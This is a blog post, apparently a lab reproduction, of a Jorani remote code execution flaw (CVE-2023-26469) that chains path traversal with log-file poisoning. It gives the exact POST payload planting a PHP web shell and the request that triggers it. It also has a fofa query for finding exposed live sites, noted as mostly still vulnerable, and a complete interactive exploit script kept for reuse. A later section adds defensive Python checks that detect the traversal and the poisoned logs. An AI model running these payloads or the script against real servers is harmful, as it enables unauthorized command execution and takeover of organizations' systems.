Jorani Remote Command Execution Vulnerability CVE-2023-26469

This article was last updated on the evening of November 10, 2024

Preface: I have been restless lately. After grinding on Xuanji (玄机) for a while I did not feel like playing competitions either, so I came to Chunqiu Yunjing (春秋云镜) to reproduce a CVE.

Target Description

Jorani is an open-source employee attendance and leave management system aimed at small and medium-sized businesses and global organizations. It streamlines employee time tracking, leave requests and approval workflows, and offers multilingual support for different regions. In Jorani 1.0.0, an attacker can use path traversal to access files and execute code on the server.

Affected Versions

Jorani < 1.0.2

Information Gathering

fofa

title="Jorani"

Looking through the overseas sites that turn up, most of them are still within the affected version range.

Reproduction

First, visit /session/login to obtain the two cookie values, csrf_cookie_jorani and jorani_session.


Construct the payload for the RCE and send it as a POST request:

csrf_test_jorani=032db15b98aa9338f9cea39fff128d04&last_page=session/login&language=../../application/logs&login=<?=`$_GET[cmd]`?>&CipheredValue=test

URL-encode it:

csrf_test_jorani=032db15b98aa9338f9cea39fff128d04&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[cmd]`%3f>&CipheredValue=test


Finally, construct the request that triggers the RCE:


/pages/view/log-2024-11-10?cmd=cat+/flag

The date at the end of the log file name depends on when the request is actually made, and the request must carry the following HTTP header:

X-REQUESTED-WITH: XMLHttpRequest

I looked it up; adding this header is probably mainly intended to strengthen front-end/back-end interaction.
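As an added defensive example (written for this article, not taken from the original post or from the Jorani project), the steps above leave three observable artefacts: a traversal sequence in the language field of the /session/login POST, a PHP open tag in the login field, and a later GET for /pages/view/log-YYYY-MM-DD. The checks below flag each of them; the log lines are constructed samples, not real Jorani output.

```python
import re
from urllib.parse import unquote

# A traversal sequence in the 'language' field, or a PHP open tag (long or short
# echo form) in user input, are the two request-side artefacts of this bug.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.I)
# The follow-up request renders a daily log file through the template viewer.
LOG_VIEW_RE = re.compile(r"^/pages/view/log-\d{4}-\d{2}-\d{2}(?:[/?#]|$)")

# Constructed sample of a CodeIgniter-style Jorani log; the exact wording of
# real Jorani log messages may differ.
SAMPLE_LOG = (
    "ERROR - 2024-11-10 15:27:04 --> 404 Page Not Found: Pages/view\n"
    "ERROR - 2024-11-10 15:28:10 --> Login attempt: <?=`$_GET[cmd]`?>\n"
    "INFO - 2024-11-10 15:29:00 --> Config Class Initialized\n"
)

def decode_param(value: str) -> str:
    """Percent-decode until stable, so ..%2F and double-encoded forms are both caught."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def suspicious_login_request(form: dict) -> list:
    """Reasons a /session/login POST body matches the CVE-2023-26469 pattern (empty if clean)."""
    reasons = []
    language = decode_param(form.get("language", ""))
    if TRAVERSAL_RE.search(language):
        reasons.append(f"language field contains path traversal: {language!r}")
    if PHP_TAG_RE.search(decode_param(form.get("login", ""))):
        reasons.append("login field carries a PHP open tag")
    return reasons

def is_log_view_request(path: str) -> bool:
    """True for paths such as /pages/view/log-2024-11-10, which load a log file as a view."""
    return LOG_VIEW_RE.match(path) is not None

def poisoned_log_lines(log_text: str) -> list:
    """1-based numbers of the lines in a Jorani log file that contain PHP code."""
    return [n for n, line in enumerate(log_text.splitlines(), 1) if PHP_TAG_RE.search(line)]

if __name__ == "__main__":
    # Constructed request body with the same shape as the write-up's payload.
    body = {"language": "..%2F..%2Fapplication%2Flogs", "login": "<%3f%3d`$_GET[cmd]`%3f>"}
    for reason in suspicious_login_request(body):
        print("[!]", reason)
    print("log view request:", is_log_view_request("/pages/view/log-2024-11-10"))
    print("poisoned log lines:", poisoned_log_lines(SAMPLE_LOG))
```

A non-empty result from poisoned_log_lines on a host that was exposed is a sign the log file should be treated as a web shell and removed, not merely rotated.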

Exploit Script

Found directly online; kept here so it is handy for one-shot use later.

"""
vulnerability covered by CVE-2023-26469
"""
import readline
import requests
import datetime
import sys
import re
import base64
import random
import string

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

msg = lambda x, y="\n": print(f'\x1b[92m[+]\x1b[0m {x}', end=y)
err = lambda x, y="\n": print(f'\x1b[91m[x]\x1b[0m {x}', end=y)
log = lambda x, y="\n": print(f'\x1b[93m[?]\x1b[0m {x}', end=y)

CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
CMD_PATTERN = re.compile('---------(.*?)---------', re.S)

URLS = {
'login': '/session/login',
'view': '/pages/view/',
}

alphabet = string.ascii_uppercase
HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))

BypassRedirect = {
'X-REQUESTED-WITH': 'XMLHttpRequest',
HEADER_NAME: ""
}

INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term

u = lambda x, y: x + URLS[y]

POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
PATH_TRAV_PAYLOAD = "../../application/logs"

if __name__ == '__main__':
print("""
/!\\ Do not use this if you are not authorized to /!\\
""")
log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n")

if len(sys.argv) == 1:
err(f"Usage: {sys.argv[0]} <url>")
exit(0)

log(f"Header used for exploit: {HEADER_NAME}")

t = sys.argv[1]

s = requests.Session()
log("Requesting session cookie")
res = s.get(u(t, "login"), verify=False)

C = s.cookies.get_dict()

Date = datetime.date.today()
log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"

csrf_token = re.findall(CSRF_PATTERN, res.text)[0]
log(f"Poisoning log file with payload: '{POISON_PAYLOAD}'")
log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")
msg(f"Recovered CSRF Token: {csrf_token}")

data = {
"csrf_test_jorani": csrf_token,
"last_page": "session/login",
"language": PATH_TRAV_PAYLOAD,
"login": POISON_PAYLOAD,
"CipheredValue": "DummyPassword"
}

s.post(u(t, "login"), data=data)

log(f"Accessing log file: {log_file_name}")

exp_page = t + URLS['view'] + log_file_name

### Shell
cmd = ""
while True:
cmd = input(INPUT)
if cmd in ['x', 'exit', 'quit']:
break
elif cmd == "":
continue
else:
BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")
res = s.get(exp_page, headers=BypassRedirect)
cmdRes = re.findall(CMD_PATTERN, res.text)
try:
print(cmdRes[0])
except:
print(res.text)
err("Wow, there was a problem, are you sure of the URL ??")
err('exiting..')
exit(0)

Here is the exploitation result on the lab range:



https://0ran9ewww.github.io/2024/11/10/cve复现/Jorani远程命令执行漏洞 CVE-2023-26469/
Author: orange
Published on November 10, 2024